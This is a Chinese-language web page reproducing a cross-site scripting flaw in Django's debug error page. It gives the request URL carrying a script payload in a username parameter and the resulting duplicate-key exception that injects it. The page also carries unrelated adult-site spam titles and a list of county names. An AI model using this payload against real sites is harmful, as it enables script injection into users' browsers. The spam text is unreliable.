中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Django debug page XSS漏洞(CVE-20

發布時間:2020-07-19 23:41:45 來源:網絡 閱讀:613 作者:小武w 欄目:安全技術

漏洞復現:
1.創建個用戶:ip:8000/create_user/?username=<script>alert(7)</script>
Django debug page XSS漏洞(CVE-20
顯示用戶已創建。
2.觸發漏洞,再次訪問ip:8000/create_user/?username=<script>alert(7)</script>
Django debug page XSS漏洞(CVE-20
3.觸發異常:duplicate key value violates unique constraint "xss_user_username_key"
DETAIL: Key (username)=(<script>alert(7)</script>) already exists.
Django debug page XSS漏洞(CVE-20
4.這個異常被拼接進The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception,最后觸發XSS。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

沭阳县| 荥阳市| 曲沃县| 安西县| 广南县| 塔河县| 台前县| 霸州市| 洛川县| 定远县| 庄浪县| 武宁县| 安宁市| 巴林右旗| 育儿| 盘山县| 东明县| 沙雅县| 科技| 邮箱| 寻甸| 张家口市| 黔东| 汉沽区| 新绛县| 岳西县| 安远县| 新密市| 长治县| 安西县| 乐昌市| 祁门县| 错那县| 闸北区| 丰宁| 通山县| 盐山县| 韶关市| 永吉县| 田林县| 东港市|